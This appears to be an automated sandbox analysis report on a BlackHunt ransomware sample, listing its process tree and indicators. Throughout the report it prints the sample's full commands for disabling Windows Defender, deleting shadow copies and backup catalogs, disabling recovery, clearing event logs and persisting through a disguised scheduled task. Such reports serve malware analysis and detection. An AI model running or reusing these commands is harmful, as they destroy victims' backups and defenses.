71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 113 PID 1556 wrote to memory of 1504 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 112 PID 1556 wrote to memory of 1504 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 112 PID 1556 wrote to memory of 4128 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 109 PID 1556 wrote to memory of 4128 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 109 PID 1556 wrote to memory of 2584 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 115 PID 1556 wrote to memory of 2584 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 115 PID 1556 wrote to memory of 4960 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 122 PID 1556 wrote to memory of 4960 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 122 PID 1556 wrote to memory of 4664 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 118 PID 1556 wrote to memory of 4664 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 118 PID 1556 wrote to memory of 2876 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 121 PID 1556 wrote to memory of 2876 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 121 PID 1556 wrote to memory of 3980 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 124 PID 1556 wrote to memory of 3980 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 124 PID 1040 wrote to memory of 3704 1040 reg.exe 123 PID 1040 wrote to memory of 3704 1040 reg.exe 123 PID 1556 wrote to memory of 4872 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 131 PID 1556 wrote to memory of 4872 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 131 PID 1556 wrote to memory of 3460 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 126 PID 1556 wrote to memory of 3460 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 126 PID 2732 wrote to memory of 1092 2732 cmd.exe 156 PID 2732 wrote to memory of 1092 2732 cmd.exe 156 PID 1556 wrote to memory of 4336 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 132 PID 1556 wrote to memory of 4336 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 132 PID 1556 wrote to memory of 2972 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 135 PID 3096 wrote to memory of 4056 3096 cmd.exe 188 PID 1556 wrote to memory of 2972 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 135 PID 3096 wrote to memory of 4056 3096 cmd.exe 188 PID 1556 wrote to memory of 3420 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 137 PID 1556 wrote to memory of 3420 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 137 PID 1848 wrote to memory of 2104 1848 cmd.exe 136 PID 1848 wrote to memory of 2104 1848 cmd.exe 136 PID 1556 wrote to memory of 948 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 142 PID 1556 wrote to memory of 948 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 142 PID 3024 wrote to memory of 4936 3024 cmd.exe 140 PID 3024 wrote to memory of 4936 3024 cmd.exe 140 PID 1556 wrote to memory of 4760 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 144 PID 1556 wrote to memory of 4760 1556 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe 144 PID 1316 wrote to memory of 4184 1316 cmd.exe 174 PID 1316 wrote to memory of 4184 1316 cmd.exe 174 PID 4808 wrote to memory of 2076 4808 Conhost.exe 145 PID 4808 wrote to memory of 2076 4808 Conhost.exe 145 PID 1504 wrote to memory of 4240 1504 cmd.exe 146 PID 1504 wrote to memory of 4240 1504 cmd.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe"C:\Users\Admin\AppData\Local\Temp\71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:4184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3460
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:9504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:9440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe" /F2⤵PID:5080
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe" /F3⤵
- Creates scheduled task(s)
PID:6464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1904
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:10208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1940
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3164
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:4808
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:656
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:556
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:396
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1768
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:10148
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:15688
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:15428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:17368
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:16004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1500
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:16020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2692
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:15584
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:11032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10376
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:11056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8904
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:16944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:16296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:16372
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:16308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:16324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10772
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:16664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:16972
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:16672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\71d42e0e9955f7f2729d62599a5a95288582a5e1e332a8117ad6e7c2c64000ca.exe"2⤵PID:5404
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:17144 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:10600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10600 -s 14724⤵
- Program crash
PID:16152
-
-
-
-
